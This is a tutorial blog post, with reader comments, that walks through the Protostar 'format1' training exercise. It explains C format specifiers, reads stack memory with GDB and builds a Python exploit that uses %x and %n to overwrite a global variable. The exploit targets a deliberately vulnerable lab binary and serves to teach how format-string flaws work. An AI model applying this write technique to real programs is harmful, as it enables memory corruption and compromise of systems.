Format strings are a handy way for programmers to whip up a string from several variables. They are designed to save the programmer time and allow their code to look much cleaner. Unbeknownst to some programmers, format strings can also be used by an attacker to compromise their entire program. In this guide, we are going to look at just how we can use a format string to exploit a running program.
What Is a Format String?
As mentioned above, a format string is a neat method by which a programmer can structure a string that they either plan to print or store to a variable. In the C programming language, a format string looks something like this:
printf( "We have %d dogs", 2 );
And will output something like this:
We have 2 dogs
The secret ingredient in the format string is the format specifier. The format specifier is the %d in the command we just wrote. When the program sees a format specifier, it knows to expect a variable to replace that specifier. In this case, the variable was the integer 2. Here's another example:
char *person1 = "Bob";
char *person2 = "Alice";
int books = 15;
printf("%s and %s have %d books", person1,person2,books);
Let's go line by line and walk through exactly what the program does.
On the first two lines, we define two strings, person1 and person2, and assign them the values of "Bob" and "Alice", respectively. On line three, we define an integer variable named books, and give it the value 15. Finally, on the last line, we print out a formatted string. In the string, we see two different format specifiers, %s and %d. As you might have guessed, each one expects a different data type. The former expects a string, while the latter expects an integer. There are several other format specifiers as well. These include %x, which prints an integer in hexadecimal, and %c, which prints a single character.
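If you'd rather experiment without compiling C, Python's % operator borrows the same specifiers. The sketch below is only an analogy (the function names are made up for illustration), and it highlights one difference that matters for the rest of this guide: Python checks that every specifier has a matching argument, while C's printf does not.

```python
def describe(person1, person2, books):
    # Same specifiers as the C example: %s for strings, %d for an integer.
    return "%s and %s have %d books" % (person1, person2, books)


def missing_argument_is_rejected():
    # Python raises TypeError when a specifier has no matching argument.
    # C's printf performs no such check.
    try:
        "%d dogs" % ()
    except TypeError:
        return True
    return False


print(describe("Bob", "Alice", 15))
print("%x" % 255)  # an integer shown in hexadecimal
print("%c" % 65)   # an integer shown as the character with that code
print(missing_argument_is_rejected())
```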
Now that we know how to use format strings, it's time to learn how to misuse them!
Taking Advantage of Vulnerable Functions
While format strings seem to merely be a different programming technique for concatenating variables and strings, this is not actually the case. Our example of format strings that we looked at above should raise one very important question: What happens when you have a format specifier in a string, but there is no variable included to replace that format specifier in the string? Let's hop back into the Protostar virtual machine to find out.
If you don't yet have Protostar installed, check out the installation guide in our first article on exploit development.
Once again, we will SSH into our virtual machine with the username user and the password user. Once we're logged in, it might be a good idea to type the following command.
bash
This will take us from our current shell program to a much more interactive shell program called Bash. This will make our command line experience much smoother.
Once that is taken care of, we're going to jump right in and take a look at the format1 level. Let's move to the same directory as the format1 executable by typing:
cd /opt/protostar/bin
Now, before we recklessly fling ourselves at the challenge, let's take a look at the source code found on Exploit Exercises.
This source code might be a little intimidating for those unfamiliar with C programming, but I promise it's not that bad.
Going line-by-line, we first see a global integer named "target" being declared without a value. The fact that this variable is being declared globally instead of inside a function is very important. This changes where, in memory, the variable is stored.
Instead of being stored on the stack, the target variable will be stored in the uninitialized data or BSS section of the program. This means we won't be able to simply flood the stack with an ungodly amount of characters to alter the value of the target variable like we have done with stack overflow vulnerabilities in previous articles.
Continuing to look at the program, we see a function declared with the name "vuln." I wonder if this is where we will find the format string vulnerability ....
The first thing that happens in the vuln function is a call to the printf function. This call will print the contents of the variable named string. We first see reference to the string variable on line 8 when it is declared as a parameter for the vuln function. This means that when the vuln function is called, a string is passed as an argument and given the variable name "string" to be used in the function.
Next, we see an "if" statement. Essentially, the statement is saying "if the variable target holds any value besides zero, print the following string." From this if statement, we can gather that our objective is to somehow modify the target variable.
Finally, we can see down on line 17 the main function of the program. Inside the main function is a call to the vuln function we just looked at, with the value "argv[1]" passed as an argument. The variable "argv[1]" refers to the first command line argument given to the program when it is originally run. This is where we will be placing our exploit once it is finished.
For now, let's just try to answer the question we posed above: What happens when you have a format specifier with no variable to replace it with?
The Odd Truth
We can see from the above source code that whatever string we pass as a command-line argument to the program will be printed on line 10 with the call to the printf function. Knowing that, let's stop talking about it and see what actually happens if we pass a format specifier as that argument:
Well, that's ... strange. When we pass the %d format specifier, instead of printing "%d" or throwing an error like we might expect, we get some random integer. Where is that integer coming from? We could fire up GDB, the GNU debugger, and try to dig through the program to find it, but looking at memory in integer form is sort of messy. Maybe there's a way we can get this number in hexadecimal form.
Like we mentioned earlier, there's another format specifier that expects a hexadecimal value. Let's see what happens if we replace %d with %x as our argument:
Lo and behold, we get a value (highlighted in red above) that looks a lot like a hexadecimal value. Let's see if we can find this value somewhere in memory with the GDB debugger.
To start GDB with the format1 program loaded, let's type the following.
gdb format1
Once GDB has started up, we need to set a breakpoint. Looking back at the source code, line 14 seems like a good choice. To set a breakpoint, we type:
break 14
Now we're all set to run the program. In GDB, you can run a program with command line arguments by using the run command with the command line arguments right after. In this case, we'll type:
run %x
This will run the program with %x as the argument. Once we run the program we should hit a breakpoint, as seen in the image below.
When we hit a breakpoint, execution of the program is halted. From here, we can examine individual chunks of memory with the x command. Let's start by looking at the stack. To do this, we'll type:
x/32x $esp
The first x is short for "examine." This command allows us to examine memory, so the name is fitting. The /32 specifies that we want to examine 32 units of memory, which are four-byte words by default. The x right after it tells GDB that we want to view this section of memory in hexadecimal format. The last term, $esp, is the stack pointer register, so the command starts reading at the top of the stack, which is the lowest address of the current stack frame. Let's see what output we get from this command.
Now we can see a ton of data from the stack, but one section should stick out to us: That same hexadecimal value that was printed earlier is sitting on the stack!
We finally have the answer to our question. When a format specifier doesn't have a corresponding variable to replace it, the program will simply grab the value in memory at the location where it would have expected the corresponding variable to be. When we have a program that improperly allows a user to print a string containing a format specifier, an attacker gains the ability to read data right from memory.
Going from Reading Data to Writing Data
While reading data we shouldn't be able to is interesting, writing data that we shouldn't be able to write is way more fun. With this fun comes complication, however, so hold onto your keyboards and get ready.
There is one more format specifier we have yet to talk about. This specifier is %n. While every other format specifier is focused on reading a particular type of data, %n is focused on writing data. Specifically, %n writes the number of characters printed so far to a variable. The important thing to note here is that the %n format specifier expects the address of that variable (a pointer to an integer), not the variable itself.
Well, wait a minute! If the program we're looking at will automatically grab an address to read from for the other format specifiers, will it automatically grab an address to write to for the %n specifier? Absolutely it will.
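To make the idea concrete, here is a toy model in Python of how printf treats %x and %n. It is not how the C library is implemented: toy_printf, the stack_words list, and the memory dictionary are all stand-ins invented for illustration, and the values are made up.

```python
import re


def toy_printf(fmt, stack_words, memory):
    """Toy model of printf that understands only %x and %n.

    stack_words stands in for the values printf would pull off the stack.
    memory is a dict (address -> value) standing in for process memory.
    """
    words = iter(stack_words)
    output = []
    written = 0  # characters printed so far
    for piece in re.split(r"(%x|%n)", fmt):
        if piece == "%x":
            # Read the next stack word and print it in hexadecimal.
            text = "%x" % next(words)
        elif piece == "%n":
            # Treat the next stack word as an address and store the
            # running character count there. Nothing is printed.
            memory[next(words)] = written
            text = ""
        else:
            text = piece
        output.append(text)
        written += len(text)
    return "".join(output)


memory = {}
print(toy_printf("AAAA.%x.%n", [0xdeadbeef, 0x1000], memory))
print(memory)
```

In this model, "AAAA.deadbeef." is 14 characters long, so %n stores 14 at the made-up address 0x1000. If an attacker controls the word that %n consumes, they control where that write lands.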
Getting to Where We Want to Be
In order for us to overwrite the target variable, we're going to need to write its address to memory and then set up %n to write to that address. In order to do that, we first need to know where our original input is on the stack.
Step 1: Finding Where We Are Starting From
In order to find where the string variable is located, let's restart the program in GDB. This time, we're going to type the following command.
run AAAA.%x.%x
Once again, we will hit the breakpoint, and we can start digging. To find the location of the string address, we'll type the following.
p string
In this command, p is short for print. For a pointer like string, this command prints the address the pointer holds, followed by the text stored at that address. Our output should look something like this:
From this output, we can gather that the text the string variable points to is located at 0xbffff987. If we examine the memory at that location, we will, in fact, find the hexadecimal representation of the four As we typed at the beginning of our input.
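As a quick sanity check on what "the hexadecimal representation of the four As" looks like, the short Python sketch below decodes four bytes the way a 32-bit x86 machine does. The helper name as_word is made up for illustration.

```python
import struct


def as_word(four_bytes):
    # "<I" means little-endian, unsigned 32-bit integer (x86 byte order).
    return struct.unpack("<I", four_bytes)[0]


print("0x%08x" % as_word(b"AAAA"))  # 'A' is 0x41, so this shows 0x41414141
print("0x%08x" % as_word(b"ABCD"))  # bytes appear reversed: 0x44434241
```

This is why a run of 41s in GDB's output or in the output of %x is the signature of our As.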
Here's the trick: This memory address (0xbffff987) is higher than the memory address of the data we read using the format specifier. This means that if we provided a string with enough format specifiers, we would continue to climb up the memory addresses until we end up returning to the beginning of our string. If we do the math, we can find out just how many format specifiers we would need to do that:
By subtracting the address of the data on the stack (roughly 0xbffff764) from the starting address of the string (0xbffff987), we can see that the two are 547 bytes (0x223) apart. By rounding that up to 548 and dividing by four, we can see we will need roughly 137 format specifiers to return to our original string. This sounds like a job for a Python script.
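The arithmetic can be checked in a few lines of Python. The string address is the one GDB printed above; the stack address 0xbffff764 is the approximate value given in the author's reply in the comments, and both will likely differ on your machine. The function name is made up for illustration.

```python
STRING_ADDR = 0xbffff987      # where our input starts, from `p string`
STACK_READ_ADDR = 0xbffff764  # approximate spot where the specifiers start reading
WORD_SIZE = 4                 # each %x consumes one four-byte word


def specifiers_needed(string_addr, read_addr, word_size=WORD_SIZE):
    distance = string_addr - read_addr
    # Ceiling division: round up to a whole number of words.
    count = -(-distance // word_size)
    return distance, count


distance, count = specifiers_needed(STRING_ADDR, STACK_READ_ADDR)
print(distance, count)
```

Treat the result as an estimate to be adjusted by trial, not an exact answer.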
Step 2: Writing a Skeleton for Our Exploit
Let's exit out of GDB and type the following command to return to our home directory.
Short and sweet. Once we're home, let's use the Nano text editor to open up a new text document.
nano exploit.py
Once we're in Nano, let's type up a skeleton exploit:
Going through the code, the first line tells the system that when this file is executed, it should be run with the Python interpreter. The next two lines import modules that we'll need for the exploit. The "os" module will allow us to make a system call to run the format1 program. The struct module will come in handy when it comes to writing memory addresses later on.
Line four creates an absolute whale of a string variable named payload. Inside that variable, we will be storing four As along with 137 format specifiers. It's very important to note the periods that are placed within the string. Each %x reads memory in aligned four-byte chunks, and where our string lands relative to those chunks shifts as the payload gets longer or shorter. We need to make sure that all four of our As fall inside a single chunk so that one format specifier reads them together. When practicing on your own, you'll just have to play around with the length of the string until you find a combination that works.
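A minimal sketch that matches this description might look like the following. It is a reconstruction, not the original listing: the shebang form, the exact placement of the periods, and the BINARY name are assumptions, and the period layout in particular is something you may need to adjust.

```python
#!/usr/bin/env python
import os
import struct  # unused for now; needed later to pack an address
payload = "AAAA." + "%x." * 137  # four As, then 137 period-separated specifiers

# Assumed location of the target, based on the directory used earlier.
BINARY = "/opt/protostar/bin/format1"

# Only launch the target where it actually exists (the Protostar VM).
if os.path.exists(BINARY):
    os.system(BINARY + " " + payload)
```

Changing the 137 is all it takes to try a different number of specifiers.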
Once we're done writing the skeleton script, we can save it and run it. Running our exploit skeleton yields the following output:
Because we supplied 137 format specifiers, we got 137 four-byte chunks of memory. This includes the memory we were looking at in GDB earlier.
Looking at the output, we can see our four As (highlighted in red). We seem to have overestimated how many format specifiers we needed though. This is most likely because our estimate was rounded up and because the stack is laid out slightly differently when a program runs under GDB instead of by itself. Editing our exploit so we only supply 132 format specifiers instead of 137 should put us exactly where we want to be:
Perfect. From here we can see the light at the end of the tunnel. The glory of exploitation is almost upon us, but there is one more step.
Step 3: Locating & Overwriting the Target Variable
We need to hop back into GDB one more time to get an important piece of information. We're going to replace the four As at the beginning of our payload string with the address of the target variable. That way, we can swap the last %x specifier for a %n specifier, which will take the address of target from our string and write the number of characters printed so far to that address. In order to get the address of target, we must type the following into GDB.
p &target
The & in front of the variable name tells GDB that we want the address of the variable, not the value of the variable itself. Running that command yields the following result:
Now, all we have to do is slap that bad boy into our program and we should be good to go. Our final exploit should look like this now:
There were two changes made: First, we added a new variable called "address." This will hold the address of the target variable. We use the struct.pack function in order to store the address in a format that the format1 program will interpret correctly.
The second change comes when we are creating the payload variable. Instead of starting the string with four As, we start with the address variable now. We make sure to include the period afterward to make sure the address aligns with where the format specifiers are reading from. We also print one fewer %x format specifier and instead print a %n format specifier in its place. This is done so that the %n format specifier will read the address we wrote at the beginning of the string and overwrite the data at that address. In this case, that address will (hopefully!) be the address of the target variable.
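Here is a hedged sketch of those two changes in Python. It is a reconstruction, not the original listing. TARGET_ADDR is a placeholder that you must replace with the address GDB reports for p &target, and build_payload, SPECIFIERS, and BINARY are names chosen for illustration. The count of 132 is the one that worked in this walkthrough and may differ on your setup.

```python
#!/usr/bin/env python
import os
import struct

# PLACEHOLDER: substitute the address GDB prints for `p &target`.
TARGET_ADDR = 0x41424344
SPECIFIERS = 132  # total specifiers needed to reach the start of our string
BINARY = "/opt/protostar/bin/format1"  # assumed path to the target


def build_payload(target_addr, specifiers):
    # "<I" packs a 4-byte unsigned integer in little-endian order,
    # which is how an x86 program expects an address to sit in memory.
    address = struct.pack("<I", target_addr)
    # Every specifier except the last is %x; the last one becomes %n.
    return address + b"." + b"%x." * (specifiers - 1) + b"%n"


payload = build_payload(TARGET_ADDR, SPECIFIERS)

# Only launch the target where it actually exists (the Protostar VM).
if os.path.exists(BINARY):
    os.system(BINARY.encode() + b' "' + payload + b'"')
```

With the placeholder value, the packed address is the four bytes "DCBA", which makes the little-endian byte order easy to see.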
Step 4: Basking in Our Success
Once we've made the necessary changes to the program, let's see what happens when we run it:
The program confirms that we hit the target variable perfectly and overwrote its data with our own. Sweet victory.
Thank you for reading! Format string exploitation is a bit of a monster to understand at first, and while these vulnerabilities don't often appear in the wild anymore, they are really great at helping you better understand what is actually going on behind the scenes of a program. Comment below with any questions or contact me via Twitter @xAllegiance.
3 Comments
Hello.
At the end of step 1, "By subtracting the address of the data on the stack from the starting address of the string variable", where do you get the "0xbffff764" memory address to do the calculation? I can't figure out where it comes from, so I can't do the calculation correctly. Where do I find that "starting address of the string variable"? However, I did the calculation according to what I thought was right (I think I failed, by the way).
When I execute the second exploit.py, it shows an error that says "Segmentation fault". I have spent at least 2 hours trying to figure out how to make it work and I haven't gotten anything yet, hehe.
P.S. Sorry for my bad English, I'm still learning.
Step one is just an approximation. The idea is that you are trying to figure out how many format specifiers you need in order to get the format specifiers to read from memory that you control. "0xbffff764" is an address close to where the format specifiers start reading from. I think the actual first address that is read from is 0xbffff774 in this example, but I moved 16 bytes (0x10) earlier so that I would overestimate instead of underestimate in case the number of format specifiers needed changed during execution outside of the GDB debugger.
Got it. Thank u!